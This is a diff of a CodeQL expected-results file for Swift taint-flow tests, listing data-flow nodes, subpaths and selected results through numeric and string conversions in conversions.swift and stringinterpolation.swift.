arr1c [Collection element] | semmle.label | arr1c [Collection element] | -| conversions.swift:189:13:189:20 | ...[...] | semmle.label | ...[...] | -| conversions.swift:190:13:190:13 | arr2c [Collection element] | semmle.label | arr2c [Collection element] | -| conversions.swift:190:13:190:20 | ...[...] | semmle.label | ...[...] | -| conversions.swift:197:6:197:6 | self [v] | semmle.label | self [v] | -| conversions.swift:199:2:201:2 | self[return] [v] | semmle.label | self[return] [v] | -| conversions.swift:199:7:199:12 | v | semmle.label | v | -| conversions.swift:200:3:200:3 | [post] self [v] | semmle.label | [post] self [v] | -| conversions.swift:200:12:200:12 | v | semmle.label | v | -| conversions.swift:205:7:205:17 | withUInt | semmle.label | withUInt | -| conversions.swift:206:13:206:13 | withUInt | semmle.label | withUInt | -| conversions.swift:211:7:211:20 | withMyValue [v] | semmle.label | withMyValue [v] | -| conversions.swift:212:13:212:13 | withMyValue [v] | semmle.label | withMyValue [v] | -| conversions.swift:212:13:212:25 | .v | semmle.label | .v | -| conversions.swift:217:2:222:2 | self[return] | semmle.label | self[return] | -| conversions.swift:217:7:217:21 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | -| conversions.swift:218:13:218:13 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | -| conversions.swift:218:13:218:26 | .v | semmle.label | .v | -| conversions.swift:219:11:219:11 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | -| conversions.swift:219:11:219:24 | .v | semmle.label | .v | -| conversions.swift:221:12:221:12 | self | semmle.label | self | -| conversions.swift:224:20:224:33 | withMyValue [v] | semmle.label | withMyValue [v] | -| conversions.swift:225:13:225:13 | withMyValue [v] | semmle.label | withMyValue [v] | -| conversions.swift:225:13:225:25 | .v | semmle.label | .v | -| conversions.swift:226:10:226:10 | withMyValue [v] | semmle.label | withMyValue [v] | -| conversions.swift:226:10:226:22 | .v | semmle.label | .v | -| conversions.swift:232:26:232:43 | call to sourceUInt(_:) | semmle.label | call to sourceUInt(_:) | -| conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:235:37:235:53 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | semmle.label | call to Int.init(withMyValue2:) | -| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:238:38:238:54 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | semmle.label | call to mkInt(withMyValue:) | -| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:241:43:241:59 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:45:12:45:39 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:45:18:45:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:46:12:46:40 | call to Double.init(_:) | semmle.label | call to Double.init(_:) | +| conversions.swift:46:19:46:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:47:12:47:40 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:47:19:47:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:48:12:48:40 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:48:12:48:42 | .utf8 | semmle.label | .utf8 | +| conversions.swift:48:19:48:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:50:12:50:39 | [...] [Collection element] | semmle.label | [...] [Collection element] | +| conversions.swift:50:19:50:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:51:12:51:12 | arr | semmle.label | arr | +| conversions.swift:52:12:52:12 | arr [Collection element] | semmle.label | arr [Collection element] | +| conversions.swift:52:12:52:17 | ...[...] | semmle.label | ...[...] | +| conversions.swift:53:12:53:23 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | +| conversions.swift:53:20:53:20 | arr [Collection element] | semmle.label | arr [Collection element] | +| conversions.swift:54:12:54:23 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | +| conversions.swift:54:12:54:26 | ...[...] | semmle.label | ...[...] | +| conversions.swift:54:20:54:20 | arr [Collection element] | semmle.label | arr [Collection element] | +| conversions.swift:55:12:55:48 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | +| conversions.swift:55:20:55:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:55:20:55:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:56:12:56:48 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | +| conversions.swift:56:12:56:51 | ...[...] | semmle.label | ...[...] | +| conversions.swift:56:20:56:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:56:20:56:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:58:13:58:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:59:13:59:13 | v | semmle.label | v | +| conversions.swift:62:18:62:50 | call to numericCast(_:) | semmle.label | call to numericCast(_:) | +| conversions.swift:62:30:62:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:63:12:63:12 | v2 | semmle.label | v2 | +| conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | +| conversions.swift:65:31:65:50 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:66:12:66:12 | v4 | semmle.label | v4 | +| conversions.swift:74:11:74:35 | call to abs(_:) | semmle.label | call to abs(_:) | +| conversions.swift:74:15:74:34 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:75:12:75:12 | v7 | semmle.label | v7 | +| conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | +| conversions.swift:90:12:90:51 | ...! | semmle.label | ...! | +| conversions.swift:90:16:90:38 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:91:12:91:53 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | +| conversions.swift:91:12:91:54 | ...! | semmle.label | ...! | +| conversions.swift:91:19:91:41 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | semmle.label | call to Self.init(littleEndian:) | +| conversions.swift:93:30:93:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:94:12:94:56 | call to Self.init(littleEndian:) | semmle.label | call to Self.init(littleEndian:) | +| conversions.swift:94:33:94:55 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:95:12:95:47 | call to Self.init(bigEndian:) | semmle.label | call to Self.init(bigEndian:) | +| conversions.swift:95:27:95:46 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:96:12:96:53 | call to Self.init(bigEndian:) | semmle.label | call to Self.init(bigEndian:) | +| conversions.swift:96:30:96:52 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:97:12:97:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:97:12:97:33 | .littleEndian | semmle.label | .littleEndian | +| conversions.swift:98:12:98:34 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:98:12:98:36 | .littleEndian | semmle.label | .littleEndian | +| conversions.swift:99:12:99:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:99:12:99:33 | .bigEndian | semmle.label | .bigEndian | +| conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | semmle.label | call to sourceUInt64(_:) | +| conversions.swift:100:12:100:36 | .bigEndian | semmle.label | .bigEndian | +| conversions.swift:136:12:136:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:137:12:137:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:137:18:137:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:139:12:139:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:139:19:139:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:140:12:140:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:140:12:140:43 | .utf8 | semmle.label | .utf8 | +| conversions.swift:140:19:140:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:141:12:141:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:141:19:141:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:142:12:142:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:142:12:142:45 | .utf8 | semmle.label | .utf8 | +| conversions.swift:142:19:142:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:143:12:143:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:143:19:143:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:144:12:144:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:144:12:144:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:144:19:144:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:146:12:146:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:146:18:146:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:147:12:147:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | +| conversions.swift:147:41:147:60 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:148:12:148:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | +| conversions.swift:148:57:148:78 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:150:12:150:66 | call to Float.init(signOf:magnitudeOf:) | semmle.label | call to Float.init(signOf:magnitudeOf:) | +| conversions.swift:150:44:150:65 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:152:12:152:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:152:12:152:35 | .exponent | semmle.label | .exponent | +| conversions.swift:153:12:153:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | +| conversions.swift:153:12:153:35 | .significand | semmle.label | .significand | +| conversions.swift:154:12:154:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:154:12:154:37 | .exponent | semmle.label | .exponent | +| conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | +| conversions.swift:155:12:155:37 | .significand | semmle.label | .significand | +| conversions.swift:156:12:156:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:156:12:156:36 | .exponent | semmle.label | .exponent | +| conversions.swift:157:12:157:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | +| conversions.swift:157:12:157:36 | .significand | semmle.label | .significand | +| conversions.swift:165:12:165:35 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:166:12:166:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:166:19:166:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | semmle.label | call to MyString.init(_:) | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) [some:0] | semmle.label | call to MyString.init(_:) [some:0] | +| conversions.swift:174:12:174:46 | ...! | semmle.label | ...! | +| conversions.swift:174:21:174:44 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:175:12:175:12 | ms2 | semmle.label | ms2 | +| conversions.swift:176:12:176:16 | .description | semmle.label | .description | +| conversions.swift:177:12:177:16 | .debugDescription | semmle.label | .debugDescription | +| conversions.swift:182:31:182:54 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:183:12:183:12 | parent | semmle.label | parent | +| conversions.swift:184:12:184:12 | parent | semmle.label | parent | +| conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | semmle.label | call to unsafeDowncast(_:to:) | +| conversions.swift:186:40:186:40 | parent | semmle.label | parent | +| conversions.swift:187:12:187:12 | v3 | semmle.label | v3 | +| conversions.swift:188:12:188:12 | v3 | semmle.label | v3 | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | semmle.label | call to sourceArray(_:) | +| conversions.swift:202:14:202:33 | [...] [Collection element] | semmle.label | [...] [Collection element] | +| conversions.swift:202:15:202:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:203:13:203:13 | arr1 | semmle.label | arr1 | +| conversions.swift:204:13:204:13 | arr2 | semmle.label | arr2 | +| conversions.swift:205:13:205:19 | ...[...] | semmle.label | ...[...] | +| conversions.swift:206:13:206:13 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | +| conversions.swift:206:13:206:19 | ...[...] | semmle.label | ...[...] | +| conversions.swift:208:19:208:29 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | +| conversions.swift:208:25:208:25 | arr1 | semmle.label | arr1 | +| conversions.swift:209:19:209:29 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | +| conversions.swift:209:25:209:25 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | +| conversions.swift:210:13:210:13 | arr1b | semmle.label | arr1b | +| conversions.swift:211:13:211:13 | arr2b | semmle.label | arr2b | +| conversions.swift:212:13:212:13 | arr1b [Collection element] | semmle.label | arr1b [Collection element] | +| conversions.swift:212:13:212:20 | ...[...] | semmle.label | ...[...] | +| conversions.swift:213:13:213:13 | arr2b [Collection element] | semmle.label | arr2b [Collection element] | +| conversions.swift:213:13:213:20 | ...[...] | semmle.label | ...[...] | +| conversions.swift:215:15:215:35 | call to ContiguousArray.init(_:) [Collection element] | semmle.label | call to ContiguousArray.init(_:) [Collection element] | +| conversions.swift:215:31:215:31 | arr1 | semmle.label | arr1 | +| conversions.swift:216:15:216:35 | call to ContiguousArray.init(_:) [Collection element] | semmle.label | call to ContiguousArray.init(_:) [Collection element] | +| conversions.swift:216:31:216:31 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | +| conversions.swift:217:13:217:13 | arr1c | semmle.label | arr1c | +| conversions.swift:218:13:218:13 | arr2c | semmle.label | arr2c | +| conversions.swift:219:13:219:13 | arr1c [Collection element] | semmle.label | arr1c [Collection element] | +| conversions.swift:219:13:219:20 | ...[...] | semmle.label | ...[...] | +| conversions.swift:220:13:220:13 | arr2c [Collection element] | semmle.label | arr2c [Collection element] | +| conversions.swift:220:13:220:20 | ...[...] | semmle.label | ...[...] | +| conversions.swift:227:6:227:6 | self [v] | semmle.label | self [v] | +| conversions.swift:229:2:231:2 | self[return] [v] | semmle.label | self[return] [v] | +| conversions.swift:229:7:229:12 | v | semmle.label | v | +| conversions.swift:230:3:230:3 | [post] self [v] | semmle.label | [post] self [v] | +| conversions.swift:230:12:230:12 | v | semmle.label | v | +| conversions.swift:235:7:235:17 | withUInt | semmle.label | withUInt | +| conversions.swift:236:13:236:13 | withUInt | semmle.label | withUInt | +| conversions.swift:241:7:241:20 | withMyValue [v] | semmle.label | withMyValue [v] | +| conversions.swift:242:13:242:13 | withMyValue [v] | semmle.label | withMyValue [v] | +| conversions.swift:242:13:242:25 | .v | semmle.label | .v | +| conversions.swift:247:2:252:2 | self[return] | semmle.label | self[return] | +| conversions.swift:247:7:247:21 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | +| conversions.swift:248:13:248:13 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | +| conversions.swift:248:13:248:26 | .v | semmle.label | .v | +| conversions.swift:249:11:249:11 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | +| conversions.swift:249:11:249:24 | .v | semmle.label | .v | +| conversions.swift:251:12:251:12 | self | semmle.label | self | +| conversions.swift:254:20:254:33 | withMyValue [v] | semmle.label | withMyValue [v] | +| conversions.swift:255:13:255:13 | withMyValue [v] | semmle.label | withMyValue [v] | +| conversions.swift:255:13:255:25 | .v | semmle.label | .v | +| conversions.swift:256:10:256:10 | withMyValue [v] | semmle.label | withMyValue [v] | +| conversions.swift:256:10:256:22 | .v | semmle.label | .v | +| conversions.swift:262:26:262:43 | call to sourceUInt(_:) | semmle.label | call to sourceUInt(_:) | +| conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:265:37:265:53 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | semmle.label | call to Int.init(withMyValue2:) | +| conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:268:38:268:54 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | semmle.label | call to mkInt(withMyValue:) | +| conversions.swift:271:35:271:60 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | +| conversions.swift:271:43:271:59 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | | file://:0:0:0:0 | .first | semmle.label | .first | | file://:0:0:0:0 | .second | semmle.label | .second | | file://:0:0:0:0 | .v | semmle.label | .v | @@ -495,16 +515,16 @@ nodes | try.swift:18:18:18:25 | call to source() | semmle.label | call to source() | | try.swift:18:18:18:25 | call to source() [some:0] | semmle.label | call to source() [some:0] | subpaths -| conversions.swift:212:13:212:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:212:13:212:25 | .v | -| conversions.swift:218:13:218:13 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:218:13:218:26 | .v | -| conversions.swift:219:11:219:11 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:219:11:219:24 | .v | -| conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:225:13:225:25 | .v | -| conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:226:10:226:22 | .v | -| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | -| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | conversions.swift:217:2:222:2 | self[return] | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | -| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | -| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | -| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | conversions.swift:199:2:201:2 | self[return] [v] | conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | +| conversions.swift:242:13:242:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:242:13:242:25 | .v | +| conversions.swift:248:13:248:13 | withMyValue2 [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:248:13:248:26 | .v | +| conversions.swift:249:11:249:11 | withMyValue2 [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:249:11:249:24 | .v | +| conversions.swift:255:13:255:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:255:13:255:25 | .v | +| conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | .v | conversions.swift:256:10:256:22 | .v | +| conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | conversions.swift:229:2:231:2 | self[return] [v] | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | +| conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | conversions.swift:247:7:247:21 | withMyValue2 [v] | conversions.swift:247:2:252:2 | self[return] | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | +| conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | conversions.swift:229:2:231:2 | self[return] [v] | conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | +| conversions.swift:271:35:271:60 | call to MyValue.init(_:) [v] | conversions.swift:254:20:254:33 | withMyValue [v] | conversions.swift:256:10:256:22 | .v | conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | +| conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | conversions.swift:229:2:231:2 | self[return] [v] | conversions.swift:271:35:271:60 | call to MyValue.init(_:) [v] | | stringinterpolation.swift:13:36:13:36 | pair [first] | stringinterpolation.swift:6:6:6:6 | self [first] | file://:0:0:0:0 | .first | stringinterpolation.swift:13:36:13:41 | .first | | stringinterpolation.swift:19:13:19:20 | call to source() | stringinterpolation.swift:6:6:6:6 | value | stringinterpolation.swift:6:6:6:6 | self [Return] [first] | stringinterpolation.swift:19:2:19:2 | [post] p1 [first] | | stringinterpolation.swift:22:21:22:21 | p1 [first] | stringinterpolation.swift:6:6:6:6 | self [first] | file://:0:0:0:0 | .first | stringinterpolation.swift:22:21:22:24 | .first | @@ -514,70 +534,76 @@ subpaths | stringinterpolation.swift:31:21:31:21 | p2 [second] | stringinterpolation.swift:7:6:7:6 | self [second] | file://:0:0:0:0 | .second | stringinterpolation.swift:31:21:31:24 | .second | #select | conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | conversions.swift:32:12:32:31 | call to sourceInt(_:) | result | -| conversions.swift:35:12:35:38 | call to Float.init(_:) | conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | result | -| conversions.swift:36:12:36:39 | call to String.init(_:) | conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | result | -| conversions.swift:37:12:37:41 | .utf8 | conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:41 | .utf8 | result | -| conversions.swift:40:12:40:12 | arr | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:40:12:40:12 | arr | result | -| conversions.swift:41:12:41:17 | ...[...] | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:41:12:41:17 | ...[...] | result | -| conversions.swift:42:12:42:23 | call to Array.init(_:) | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:42:12:42:23 | call to Array.init(_:) | result | -| conversions.swift:43:12:43:26 | ...[...] | conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:43:12:43:26 | ...[...] | result | -| conversions.swift:44:12:44:48 | call to Array.init(_:) | conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:12:44:48 | call to Array.init(_:) | result | -| conversions.swift:45:12:45:51 | ...[...] | conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:12:45:51 | ...[...] | result | -| conversions.swift:48:13:48:13 | v | conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:48:13:48:13 | v | result | -| conversions.swift:52:12:52:12 | v2 | conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:52:12:52:12 | v2 | result | -| conversions.swift:55:12:55:12 | v4 | conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:55:12:55:12 | v4 | result | -| conversions.swift:64:12:64:12 | v7 | conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:64:12:64:12 | v7 | result | -| conversions.swift:75:12:75:51 | ...! | conversions.swift:75:16:75:38 | call to sourceString(_:) | conversions.swift:75:12:75:51 | ...! | result | -| conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | result | -| conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | result | -| conversions.swift:79:12:79:33 | .littleEndian | conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | result | -| conversions.swift:80:12:80:33 | .bigEndian | conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | result | -| conversions.swift:108:12:108:33 | call to sourceFloat(_:) | conversions.swift:108:12:108:33 | call to sourceFloat(_:) | conversions.swift:108:12:108:33 | call to sourceFloat(_:) | result | -| conversions.swift:109:12:109:40 | call to Float.init(_:) | conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | result | -| conversions.swift:111:12:111:41 | call to String.init(_:) | conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to String.init(_:) | result | -| conversions.swift:112:12:112:43 | .utf8 | conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:43 | .utf8 | result | -| conversions.swift:113:12:113:43 | call to String.init(_:) | conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | result | -| conversions.swift:114:12:114:45 | .utf8 | conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:45 | .utf8 | result | -| conversions.swift:115:12:115:42 | call to String.init(_:) | conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | result | -| conversions.swift:116:12:116:44 | .utf8 | conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:44 | .utf8 | result | -| conversions.swift:118:12:118:40 | call to Float.init(_:) | conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | result | -| conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | result | -| conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | result | -| conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | result | -| conversions.swift:124:12:124:35 | .exponent | conversions.swift:124:12:124:33 | call to sourceFloat(_:) | conversions.swift:124:12:124:35 | .exponent | result | -| conversions.swift:125:12:125:35 | .significand | conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | result | -| conversions.swift:126:12:126:37 | .exponent | conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | result | -| conversions.swift:127:12:127:37 | .significand | conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | result | -| conversions.swift:128:12:128:36 | .exponent | conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | result | -| conversions.swift:129:12:129:36 | .significand | conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | result | -| conversions.swift:135:12:135:35 | call to sourceString(_:) | conversions.swift:135:12:135:35 | call to sourceString(_:) | conversions.swift:135:12:135:35 | call to sourceString(_:) | result | -| conversions.swift:136:12:136:43 | call to String.init(_:) | conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | result | -| conversions.swift:145:12:145:12 | ms2 | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:145:12:145:12 | ms2 | result | -| conversions.swift:146:12:146:16 | .description | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:146:12:146:16 | .description | result | -| conversions.swift:147:12:147:16 | .debugDescription | conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:147:12:147:16 | .debugDescription | result | -| conversions.swift:153:12:153:12 | parent | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:153:12:153:12 | parent | result | -| conversions.swift:154:12:154:12 | parent | conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:154:12:154:12 | parent | result | -| conversions.swift:157:12:157:12 | v3 | 